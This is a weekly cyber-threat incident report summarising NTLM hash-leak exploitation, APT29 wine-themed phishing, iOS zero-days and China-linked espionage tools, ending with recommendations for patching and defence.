Full Report
Can a harmless click really lead to a full-blown cyberattack? Surprisingly, yes — and that’s exactly what we saw in last week’s activity. Hackers are getting better at hiding inside everyday actions: opening a file, running a project, or logging in like normal. No loud alerts. No obvious red flags. Just quiet entry through small gaps — like a misconfigured pipeline, a trusted browser feature,
Analysis Summary
# Incident Report: Weekly Summary of Active Exploitations and Threat Actor Activities
## Executive Summary
This report summarizes several contemporaneous, high-profile cybersecurity events, including the active exploitation of a recently patched Windows NTLM flaw (CVE-2025-24054), sophisticated phishing campaigns targeting European diplomats by APT29, zero-day exploitation on iOS devices, and espionage activities by China-linked groups against Linux systems and developers. The incidents highlight a trend where attackers are exploiting minor misconfigurations, trusted workflows, and delayed patching cycles to achieve initial access and deploy modular, stealthy malware.
## Incident Details
- Discovery Date: Week of April 21, 2025 (Based on article date)
- Incident Date: Varies; CVE-2025-24054 exploitation started March 19, 2025.
- Affected Organization: Multiple entities across various sectors, including diplomatic entities, cryptocurrency developers, and unspecified organizations in Myanmar.
- Sector: Technology, Cryptocurrency, Government/Diplomacy
- Geography: Global (Specific mentions: Ukraine, Colombia, Myanmar, Europe, US-based organizations)
## Timeline of Events
### Initial Access
- **Date/Time:** Exploitation of CVE-2025-24054 began March 19, 2025.
- **Vector:** Hash disclosure spoofing bug (CVE-2025-24054) in Windows NTLM; Sophisticated phishing using wine-tasting lures (APT29); Compromised Python projects shared as coding challenges (Slow Pisces).
- **Details:** Attackers exploited the flaw in Windows NTLM to leak NTLM hashes or user passwords. APT29 utilized malicious ZIP archives delivered via emails with wine-tasting themes. Slow Pisces targeted developers by making them run malicious projects they believed were legitimate coding challenges.
### Lateral Movement
- **Mustang Panda:** Used the custom tool StarProxy.
- **UNC5174:** Employed the stealthy RAT VShell for remote access and likely further internal navigation.
### Data Exfiltration/Impact
- **CVE-2025-24054:** Goal was to leak NTLM hashes or user passwords to infiltrate systems.
- **Slow Pisces:** Deployment of RN Stealer malware aimed at stealing sensitive data from cryptocurrency developers.
- **UNC5174:** Espionage activities and access resale campaigns.
### Detection & Response
- **Detection (CVEs):** The NTLM flaw was actively exploited before Microsoft released a patch last month (April 2025).
- **Detection (iOS):** Apple detected and fixed two actively exploited zero-days (CVE-2025-31200 & CVE-2025-31201) used in "extremely sophisticated" targeted attacks.
- **Response Actions:** Microsoft periodically patched the NTLM variant (CVE-2024-43451 in Nov 2024, CVE-2025-24054 in April 2025). Apple released fixes for iOS 18.4.1 and related OS versions.
## Attack Methodology
- **Initial Access:** NTLM Hash Disclosure (CVE-2025-24054), Phishing leading to ZIP archive execution (APT29), Execution of compromised code/projects (Slow Pisces), Exploitation of iOS zero-days (Apple attacks).
- **Persistence:** GRAPELOADER (APT29 payload), VShell RAT (UNC5174).
- **Privilege Escalation:** Not explicitly detailed, but implied via NTLM hash leakage.
- **Defense Evasion:** Mustang Panda used a custom driver, SplatCloak, to evade EDR software. UNC5174 uses in-memory malware (VShell).
- **Credential Access:** NTLM hash leakage/spoofing.
- **Discovery:** Mustang Panda deployed custom tools targeting Myanmar.
- **Lateral Movement:** StarProxy (Mustang Panda utility).
- **Collection:** RN Stealer (Slow Pisces).
- **Exfiltration:** Not explicitly detailed, but implied by the nature of stegner malware.
- **Impact:** System infiltration, credential theft, espionage, and deployment of customized toolsets.
## Impact Assessment
- **Financial:** Not quantified, but significant potential costs due to continuous patching cycles and the required investigation for state-sponsored threats.
- **Data Breach:** User credentials (NTLM hashes/passwords); Sensitive data from crypto developers; Intelligence gathering against diplomatic targets.
- **Operational:** Interruption for developers forced to run malicious code; Potential disruption to diplomatic communications.
- **Reputational:** High risk for targeted diplomacy and cryptocurrency organizations involved.
## Indicators of Compromise
*Note: Due to the summary nature of the source, specific IOCs are not provided, but patterns are noted.*
- **Network indicators:** Use of new C2 infrastructure by UNC5174 since Jan 2025.
- **File indicators:** RN Loader, RN Stealer, TONESHELL, PAKLOG, CorKLOG, StarProxy, SplatCloak, GRAPELOADER, VShell.
- **Behavioral indicators:** Execution of Python projects requiring runtime compilation; Phishing emails using wine-tasting themes; NTLM hash interaction attempts post-patching cycle.
## Response Actions
- **Containment:** Microsoft released patches for the NTLM flaw (CVE-2025-24054). Apple released urgent OS updates (iOS 18.4.1, etc.).
- **Eradication:** In efforts deployed against specific campaigns (e.g., if identified), removal of TONESHELL, VShell, and related custom binaries would be necessary.
- **Recovery:** Updating/reimaging affected endpoints to the secured versions of operating systems and patches.
## Lessons Learned
- Delay in patching post-release vulnerability disclosure (e.g., NTLM flaw exploited since March 19 after a prior related patch in November 2024) immediately translates to active exploitation.
- Stealthy, legitimate-looking vectors (coding challenges, simple file opening) bypass traditional noisy alerts.
- Threat actors are aggressively evolving their toolsets (e.g., Mustang Panda debuting 5 new tools) specifically to defeat EDR solutions.
## Recommendations
- Prioritize immediate patching for all NTLM-related vulnerabilities (e.g., verifying protections implemented against CVE-2025-24054 variants).
- Implement enhanced scrutiny for software executables shared via non-standard channels, especially when targeting high-value individuals like software developers.
- Ensure EDR/AV solutions are current and routinely test evasion techniques that bypass detection layers.
- Review diplomatic communication security protocols following high-profile state-sponsored phishing campaigns.